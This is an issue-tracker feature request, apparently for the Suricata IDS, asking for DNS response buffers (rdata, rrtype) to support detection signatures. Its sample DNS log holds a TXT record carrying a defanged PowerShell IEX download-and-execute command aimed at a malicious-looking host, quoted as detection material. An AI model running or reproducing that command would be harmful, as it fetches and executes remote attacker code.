Project

General

Profile

Actions

Feature #2448

open

Add additional buffers for DNS Responses

Added by Jack Mott over 4 years ago. Updated about 1 year ago.

Status:
New
Priority:
Normal
Assignee:
Target version:
Effort:
Difficulty:
Label:
Beginner, Protocol

Description

Hi,

It would be nice to be able to include additional buffers for the DNS protocol responses to help write more efficient and effective signatures.

I think buffers for sections like rdata and rrtype should be included to cover things like data in TXT Records, but it could be expanded to cover the other sections of the response.

{  
   "timestamp":"2018-02-14T19:12:58.760866-0700",
   "flow_id":345727363089610,
   "pcap_cnt":4,
   "event_type":"dns",
   "src_ip":"8.8.8.8",
   "src_port":53,
   "dest_ip":"192.168.0.105",
   "dest_port":49153,
   "proto":"UDP",
   "dns":{  
      "type":"answer",
      "id":2,
      "rcode":"NOERROR",
      "rrname":"shinobotps1[.]com",
      "rrtype":"TXT",
      "ttl":3600,
      "rdata":"powershell IEX (New-Object Net.WebClient).DownloadString('hxxps:\/\/shinobotps1[.]com\/download_get.php');" 
   }
}

Thanks!


Related issues 2 (2 open0 closed)

Related to Feature #2198: Extend the DNS parser to accept dns_response keyword in signaturesNewCommunity TicketActions
Related to Task #4097: Suricon 2020 brainstormAssignedVictor JulienActions
Actions

Also available in: Atom PDF